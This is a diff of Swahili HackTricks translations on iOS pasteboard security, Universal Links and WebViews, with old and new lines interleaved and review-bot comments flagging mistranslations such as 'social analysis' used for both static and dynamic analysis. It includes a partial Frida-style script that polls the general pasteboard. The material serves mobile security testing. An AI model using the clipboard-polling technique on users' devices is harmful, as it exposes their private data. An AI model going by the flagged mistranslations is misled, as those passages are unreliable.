* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
Kugawana data ndani na kati ya programu kwenye vifaa vya iOS kunarahisishwa na mbinu ya [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambayo imegawanywa katika makundi mawili makuu:
Kushiriki data ndani na kati ya programu kwenye vifaa vya iOS kunarahisishwa na mekanizma ya [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambayo imegawanywa katika makundi mawili makuu:
- **Ubao wa kunakili wa jumla kwa mfumo mzima**: Hii hutumiwa kugawana data na **programu yoyote** na imeundwa kudumu data hata baada ya kuanzisha upya kifaa au kuondoa programu, kipengele kilichopatikana tangu iOS 10.
- **Ubao wa kunakili wa desturi / wenye majina**: Hizi ni maalum kwa kugawana data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho cha timu sawa, na hazijabuniwa kudumu zaidi ya maisha ya mchakato wa programu inayounda, kufuatia mabadiliko yaliyoletwa katika iOS 10.
- **Pasteboard ya jumla ya mfumo**: Hii inatumika kwa kushiriki data na **programu yoyote** na imeundwa kudumisha data hata baada ya vifaa kuanzishwa upya na kufutwa kwa programu, kipengele ambacho kimekuwa kinapatikana tangu iOS 10.
- **Pasteboards za Kawaida / Zilizotajwa**: Hizi ni maalum kwa kushiriki data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho sawa cha timu, na hazijaundwa kudumisha zaidi ya maisha ya mchakato wa programu unaozizalisha, kufuatia mabadiliko yaliyoanzishwa katika iOS 10.
**Mambo ya kuzingatia kiusalama** yanacheza jukumu muhimu wakati wa kutumia ubao wa kunakili. Kwa mfano:
- Hakuna mbinu ya watumiaji kusimamia ruhusa za programu kupata **ubao wa kunakili**.
- Ili kupunguza hatari ya ufuatiliaji usioidhinishwa wa ubao wa kunakili, upatikanaji umefungwa wakati programu iko mbele (tangu iOS 9).
- Matumizi ya ubao wa kunakili wenye majina ya kudumu yanapendekezwa badala ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
- Kipengele cha **Ubao wa Kielelezo** kilicholetwa na iOS 10, kuruhusu yaliyomo kushirikiwa kati ya vifaa kupitia ubao wa jumla, kinaweza kusimamiwa na watengenezaji kuweka muda wa kumalizika kwa data na kulemaza uhamishaji wa yaliyomo kiotomatiki.
**Mambo ya usalama** yana jukumu muhimu wakati wa kutumia pasteboards. Kwa mfano:
- Hakuna mekanizma kwa watumiaji kudhibiti ruhusa za programu kufikia **pasteboard**.
- Ili kupunguza hatari ya ufuatiliaji usioidhinishwa wa nyuma wa pasteboard, ufikiaji umewekwa mipaka wakati programu iko mbele (tangu iOS 9).
- Matumizi ya pasteboards za kudumu zenye majina yanakabiliwa na kupuuziliwa mbali kwa ajili ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
- Kipengele cha **Universal Clipboard** kilichozinduliwa na iOS 10, kinachoruhusu maudhui kushirikiwa kati ya vifaa kupitia pasteboard ya jumla, kinaweza kudhibitiwa na wabunifu kuweka muda wa kuisha wa data na kuzima uhamishaji wa maudhui kiotomatiki.
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi kimakosa** kwenye ubao wa kunakili wa jumla ni muhimu. Aidha, programu zinapaswa kuundwa kuzuia matumizi mabaya ya data ya ubao wa kunakili wa jumla kwa hatua zisizokusudiwa, na watengenezaji wanahimizwa kutekeleza hatua za kuzuia kunakili wa taarifa nyeti kwenye ubao wa kunakili.
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi bila kukusudia** kwenye pasteboard ya ulimwengu ni muhimu. Zaidi ya hayo, programu zinapaswa kubuniwa ili kuzuia matumizi mabaya ya data ya pasteboard ya ulimwengu kwa vitendo visivyokusudiwa, na wabunifu wanahimizwa kutekeleza hatua za kuzuia kunakiliwa kwa taarifa nyeti kwenye clipboard.
### Uchambuzi Stahiki
### Uchambuzi wa Kijamii
Kwa uchambuzi stahiki, tafuta msimbo wa chanzo au binary kwa:
- `generalPasteboard` kutambua matumizi ya **ubao wa kunakili wa jumla kwa mfumo mzima**.
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **ubao wa kunakili wa desturi**. Thibitisha ikiwa kudumu kumewezeshwa, ingawa hii imepitwa na wakati.
Kwa uchambuzi wa kijamii, tafuta msimbo wa chanzo au binary kwa:
- `generalPasteboard` ili kubaini matumizi ya **pasteboard ya jumla ya mfumo**.
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **pasteboards za kawaida**. Thibitisha ikiwa kudumu kumewashwa, ingawa hii imeondolewa.
### Uchambuzi wa Kudumu
### Uchambuzi wa Kijamii
Uchambuzi wa kudumu unahusisha kufunga au kufuatilia njia maalum:
- Angalia `generalPasteboard` kwa matumizi ya mfumo mzima.
- Fuatilia `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa utekelezaji wa desturi.
- Angalia wito wa mbinu ya zamani ya `setPersistent:` kuthibitisha mipangilio ya kudumu.
Uchambuzi wa kijamii unahusisha kuunganisha au kufuatilia mbinu maalum:
- Fuata `generalPasteboard` kwa matumizi ya mfumo mzima.
- Fuata `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa utekelezaji wa kawaida.
- Angalia wito wa mbinu ya zamani `setPersistent:` ili kuangalia mipangilio ya kudumu.
Maelezo muhimu ya kufuatilia ni pamoja na:
- **Majina ya ubao wa kunakili** na **maudhui** (kwa mfano, kuchunguza herufi, URL, picha).
- **Idadi ya vitu** na **aina za data** zilizopo, kwa kutumia ukaguzi wa aina za data za kawaida na desturi.
- **Muda wa kumalizika na chaguzi za ndani-pekee** kwa kuchunguza njia ya `setItems:options:`.
- **Majina ya pasteboard** na **maudhui** (kwa mfano, kuangalia nyuzi, URLs, picha).
- **Idadi ya vitu** na **aina za data** zilizopo, ukitumia ukaguzi wa aina za data za kawaida na za kawaida.
- **Muda wa kuisha na chaguo za ndani pekee** kwa kukagua mbinu ya `setItems:options:`.
Mfano wa matumizi ya zana ya ufuatiliaji ni **ufuatiliaji wa ubao wa kunakili wa objection**, ambao unachunguza ubao wa kunakili wa jumla kila sekunde 5 kwa mabadiliko na kutoa data mpya.
Mfano wa matumizi ya zana ya kufuatilia ni **monitor ya pasteboard ya objection**, ambayo inachunguza generalPasteboard kila sekunde 5 kwa mabadiliko na kutoa data mpya.
Hapa kuna mfano rahisi wa skripti ya JavaScript, iliyochochewa na njia ya objection, kusoma na kurekodi mabadiliko kutoka kwenye ubao wa kunakili kila sekunde 5:
Hapa kuna mfano rahisi wa skripti ya JavaScript, iliyochochewa na mbinu ya objection, kusoma na kurekodi mabadiliko kutoka kwa pasteboard kila sekunde 5:
```javascript
const UIPasteboard = ObjC.classes.UIPasteboard;
const Pasteboard = UIPasteboard.generalPasteboard();
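Review bot: Both section headings in this hunk now read "### Uchambuzi wa Kijamii" ("social analysis"), so the static-analysis and dynamic-analysis sections become indistinguishable, and the same term is carried into the body ("Kwa uchambuzi wa kijamii, tafuta msimbo wa chanzo..." and "Uchambuzi wa kijamii unahusisha kuunganisha au kufuatilia..."). Suggest distinct headings such as "### Uchambuzi Tuli" for static and "### Uchambuzi wa Kidinamiki" for dynamic, with the body sentences adjusted to match. Two smaller points: "ukaguzi wa aina za data za kawaida na za kawaida" repeats "kawaida" where standard versus custom data types were meant ("za kawaida na maalum" keeps the distinction), and "ingawa hii imeondolewa" says persistence was removed, whereas the later line "Angalia wito wa mbinu ya zamani `setPersistent:`" treats it as a still-present, deprecated API.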
@ -74,7 +75,7 @@ console.log(items);
}, 1000 * 5);
```
## Marejeo
## References
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8)
* [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi)
@ -85,16 +86,17 @@ console.log(items);
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,30 +1,31 @@
# Viungo vya Kisasa vya iOS
# iOS Universal Links
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Utangulizi
## Introduction
Viungo vya kisasa hutoa uzoefu wa **kuhamisha moja kwa moja** kwa watumiaji kwa kufungua moja kwa moja maudhui kwenye programu, bila haja ya kuhamishiwa kwa Safari. Viungo hivi ni **pekee** na salama, kwani haviwezi kudaiwa na programu nyingine. Hii inahakikishwa kwa kuwa na faili ya JSON ya `apple-app-site-association` kwenye saraka ya mizizi ya wavuti, kuanzisha kiungo kinachoweza kuthibitishwa kati ya wavuti na programu. Katika hali ambapo programu haijainstalled, Safari itachukua na kumwongoza mtumiaji kwenye ukurasa wa wavuti, ikiendeleza uwepo wa programu.
Universal links hutoa **uzoefu wa uelekezaji** usio na mshono kwa watumiaji kwa kufungua moja kwa moja maudhui katika programu, ikiepuka hitaji la uelekezaji wa Safari. Viungo hivi ni **vya kipekee** na salama, kwani haviwezi kudaiwa na programu nyingine. Hii inahakikishwa kwa kuhifadhi faili ya `apple-app-site-association` ya JSON kwenye saraka ya mzizi ya tovuti, ikianzisha kiungo kinachoweza kuthibitishwa kati ya tovuti na programu. Katika hali ambapo programu haijasanidiwa, Safari itachukua jukumu na kumwelekeza mtumiaji kwenye ukurasa wa wavuti, ikihifadhi uwepo wa programu.
Kwa watafiti wa udukuzi, faili ya `apple-app-site-association` ni ya kipekee kwani inaweza kufunua njia **nyeti**, pengine zinazohusiana na vipengele visivyotolewa bado.
Kwa wapimaji wa penetration, faili ya `apple-app-site-association` ni ya umuhimu maalum kwani inaweza kufichua **njia nyeti**, ambazo zinaweza kujumuisha zile zinazohusiana na vipengele ambavyo havijachapishwa.
### **Kuchambua Uhalali wa Domain Zilizohusishwa**
### **Kuchambua Haki za Domain Zinazohusiana**
Wabunifu huwezesha Viungo vya Kisasa kwa kusanidi **Domain Zilizohusishwa** katika kichupo cha Uwezo cha Xcode au kwa kuchunguza faili ya `.entitlements`. Kila kikoa kinaanzishwa na `applinks:`. Kwa mfano, usanidi wa Telegram unaweza kuonekana kama ifuatavyo:
Wakuu wa programu wanawezesha Universal Links kwa kusanidi **Domains Zinazohusiana** katika tab ya Uwezo ya Xcode au kwa kukagua faili ya `.entitlements`. Kila domain inaanzishwa na `applinks:`. Kwa mfano, usanidi wa Telegram unaweza kuonekana kama ifuatavyo:
```xml
<key>com.apple.developer.associated-domains</key>
<array>
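Review bot: "Wakuu wa programu wanawezesha Universal Links..." renders "developers" as "app heads", while other lines of this commit use "wabunifu" (designers) and "waendelezaji" for the same word; pick one term (waendelezaji is the usual one) and use it throughout. Also, "Katika hali ambapo programu haijasanidiwa" says the app is "not configured", but the fallback to Safari happens when the app is not installed ("haijasakinishwa"), which is what the sentence it replaces ("haijainstalled") meant. "Kwa wapimaji wa penetration" is half-translated; "wapimaji wa usalama" or the plain "pentesters" would be consistent.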
@ -32,21 +33,21 @@ Wabunifu huwezesha Viungo vya Kisasa kwa kusanidi **Domain Zilizohusishwa** kati
<string>applinks:t.me</string>
</array>
```
Kwa ufahamu kamili zaidi, tazama [Hati za Maendeleo ya Apple zilizohifadhiwa](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
Kwa maelezo zaidi ya kina, rejelea [nyaraka za Apple Developer zilizohifadhiwa](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
Ikiwa unafanya kazi na programu iliyoundwa, ruhusu zinaweza kuchimbuliwa kama ilivyoelezwa katika [mwongozo huu](extracting-entitlements-from-compiled-application.md).
Ikiwa unafanya kazi na programu iliyokusanywa, haki zinaweza kutolewa kama ilivyoelezwa katika [hiki kiongozi](extracting-entitlements-from-compiled-application.md).
### **Kupata Faili ya Umoja wa Programu ya Apple**
### **Kurejesha Faili ya Muungano wa Tovuti ya Programu ya Apple**
Faili ya `apple-app-site-association` inapaswa kupatikana kutoka kwenye seva kwa kutumia uwanja ulioelezwa katika ruhusa. Hakikisha faili inapatikana kupitia HTTPS moja kwa moja kwa `https://<uwanja>/apple-app-site-association`. Zana kama [Mthibitishaji wa Umoja wa Programu ya Apple (AASA)](https://branch.io/resources/aasa-validator/) inaweza kusaidia katika mchakato huu.
Faili ya `apple-app-site-association` inapaswa kurejeshwa kutoka kwa seva kwa kutumia maeneo yaliyoainishwa katika haki. Hakikisha faili inapatikana kupitia HTTPS moja kwa moja kwenye `https://<domain>/apple-app-site-association`. Zana kama [Mthibitishaji wa Muungano wa Tovuti ya Programu ya Apple (AASA)](https://branch.io/resources/aasa-validator/) zinaweza kusaidia katika mchakato huu.
### **Kushughulikia Viungo vya Umoja katika Programu**
### **Kushughulikia Viungo vya Ulimwengu katika Programu**
Programu lazima iwekeze njia maalum za kushughulikia viungo vya umoja kwa usahihi. Njia kuu ya kutafuta ni [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Ni muhimu kwamba mpango wa URL ulioshughulikiwa ni HTTP au HTTPS, kwani vinginevyo hautasaidiwa.
Programu lazima itekeleze mbinu maalum ili kushughulikia viungo vya ulimwengu kwa usahihi. Mbinu kuu ya kutafuta ni [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Ni muhimu kwamba mpango wa URL zinazoshughulikiwa ni HTTP au HTTPS, kwani zingine hazitasaidiwa.
#### **Kuthibitisha Njia ya Kukabiliana na Data**
#### **Kuthibitisha Mbinu ya Kushughulikia Data**
Wakati kiungo cha umoja kinapofungua programu, kitu cha `NSUserActivity` kinapitishwa kwa programu pamoja na URL. Kabla ya kusindika URL hii, ni muhimu kuthibitisha na kuisafisha ili kuzuia hatari za usalama. Hapa kuna mfano katika Swift unaodhihirisha mchakato huo:
Wakati kiungo cha ulimwengu kinapofungua programu, kitu cha `NSUserActivity` kinapitishwa kwa programu na URL. Kabla ya kushughulikia URL hii, ni muhimu kuthibitisha na kusafisha ili kuzuia hatari za usalama. Hapa kuna mfano katika Swift unaoonyesha mchakato:
```swift
func application(_ application: UIApplication, continue userActivity: NSUserActivity,
restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {
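Review bot: "Faili ya `apple-app-site-association` inapaswa kurejeshwa kutoka kwa seva kwa kutumia maeneo yaliyoainishwa katika haki" renders "domains" as "maeneo" (places/areas) even though the same hunk then writes `https://<domain>/apple-app-site-association` and the earlier paragraph uses "domain"; keep one term for the entitlement domains. The feature name also drifts within this file between "Universal Links", "Viungo vya Ulimwengu" and, in the section headings, "Viungo vya Umoja"; one name should be used consistently so a reader can match the heading to the body text.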
@ -58,7 +59,7 @@ application.open(url, options: [:], completionHandler: nil)
return true
}
```
URLs inapaswa kuchambuliwa na kuthibitishwa kwa uangalifu, hasa ikiwa zina vigezo, ili kujilinda dhidi ya uwezekano wa kughushi au data iliyo na hitilafu. API ya `NSURLComponents` ni muhimu kwa kusudi hili, kama ilivyodhihirishwa hapa chini:
URLs zinapaswa kuchambuliwa na kuthibitishwa kwa makini, hasa ikiwa zinajumuisha vigezo, ili kujilinda dhidi ya udanganyifu au data isiyo sahihi. API ya `NSURLComponents` ni muhimu kwa ajili hii, kama inavyoonyeshwa hapa chini:
```swift
func application(_ application: UIApplication,
continue userActivity: NSUserActivity,
@ -84,28 +85,26 @@ return false
}
}
```
Kupitia **mipangilio na uthibitisho makini**, wabunifu wanaweza kuhakikisha kuwa viungo vya kipekee vinaboresha uzoefu wa mtumiaji wakati bado wanazingatia viwango vya usalama na faragha.
Kupitia **mipangilio na uthibitisho wa makini**, waendelezaji wanaweza kuhakikisha kwamba viungo vya ulimwengu vinaboresha uzoefu wa mtumiaji huku wakihifadhi viwango vya usalama na faragha.
## Tools
* [GetUniversal.link](https://getuniversal.link/): Inasaidia kurahisisha upimaji na usimamizi wa Viungo vya Ulimwengu vya programu yako na faili ya AASA. Ingiza tu kikoa chako ili kuthibitisha uhalali wa faili ya AASA au tumia dashibodi maalum ili kupima tabia ya kiungo kwa urahisi. Chombo hiki pia kinakusaidia kubaini wakati Apple itakapofanya utafutaji wa faili yako ya AASA.
## Vifaa
* [GetUniversal.link](https://getuniversal.link/): Inasaidia kusahihisha upimaji na usimamizi wa Viungo vya Kipekee vya programu yako na faili ya AASA. Ingiza tu kikoa chako ili kuthibitisha uadilifu wa faili ya AASA au tumia dashibodi ya desturi kwa urahisi kujaribu tabia ya kiungo. Kifaa hiki pia husaidia kujua lini Apple itaorodhesha faili yako ya AASA ijayo.
## Marejeo
## References
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis)
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

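Review bot: "## Vifaa" (equipment/devices) is an odd heading for a software-tool list, and the paragraph under it calls the tool "Kifaa hiki"; "Zana" is the usual word for tools in this sense, or keep the English "## Tools" if headings are being kept in English as "## References" below it is. The same two paragraphs describe the feature as "Viungo vya Ulimwengu" and "Viungo vya Kipekee" respectively; choose one.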
View file

@ -1,31 +1,32 @@
# iOS WebViews
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Nambari ya ukurasa huu ilichukuliwa kutoka [hapa](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Angalia ukurasa kwa maelezo zaidi.
The code of this page was extracted from [here](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Check the page for further details.
## Aina za WebViews
## WebViews types
WebViews hutumiwa ndani ya programu kuonyesha maudhui ya wavuti kwa njia ya kuingiliana. Aina mbalimbali za WebViews hutoa utendaji na huduma za usalama tofauti kwa programu za iOS. Hapa kuna muhtasari mfupi:
WebViews zinatumika ndani ya programu kuonyesha maudhui ya wavuti kwa njia ya mwingiliano. Aina mbalimbali za WebViews hutoa kazi tofauti na vipengele vya usalama kwa programu za iOS. Hapa kuna muhtasari mfupi:
- **UIWebView**, ambayo haipendekezwi tena kutoka iOS 12 kwenda mbele kutokana na ukosefu wake wa msaada wa kuzima **JavaScript**, hivyo kuifanya kuwa rahisi kwa mashambulizi ya kuingiza script na **Cross-Site Scripting (XSS)**.
- **UIWebView**, ambayo haitashauriwa tena kuanzia iOS 12 kwa sababu ya ukosefu wa msaada wa kuzima **JavaScript**, na kuifanya iwe hatarini kwa kuingizwa kwa script na mashambulizi ya **Cross-Site Scripting (XSS)**.
- **WKWebView** ni chaguo bora kwa kuunganisha maudhui ya wavuti kwenye programu, ikitoa udhibiti ulioboreshwa juu ya maudhui na huduma za usalama. **JavaScript** imeamilishwa kwa chaguo-msingi, lakini inaweza kuzimwa ikihitajika. Pia inasaidia huduma za kuzuia JavaScript kutoka kufungua madirisha kiotomatiki na kuhakikisha kuwa maudhui yote yanapakia kwa usalama. Kwa kuongezea, muundo wa **WKWebView** unapunguza hatari ya uharibifu wa kumbukumbu kuathiri mchakato mkuu wa programu.
- **WKWebView** ni chaguo linalopendekezwa kwa kuingiza maudhui ya wavuti katika programu, ikitoa udhibiti ulioimarishwa juu ya maudhui na vipengele vya usalama. **JavaScript** imewezeshwa kwa default, lakini inaweza kuzimwa ikiwa inahitajika. Pia inasaidia vipengele vya kuzuia **JavaScript** kufungua madirisha kiotomatiki na kuhakikisha kuwa maudhui yote yanapakiwa kwa usalama. Zaidi ya hayo, usanifu wa **WKWebView** hupunguza hatari ya uharibifu wa kumbukumbu kuathiri mchakato mkuu wa programu.
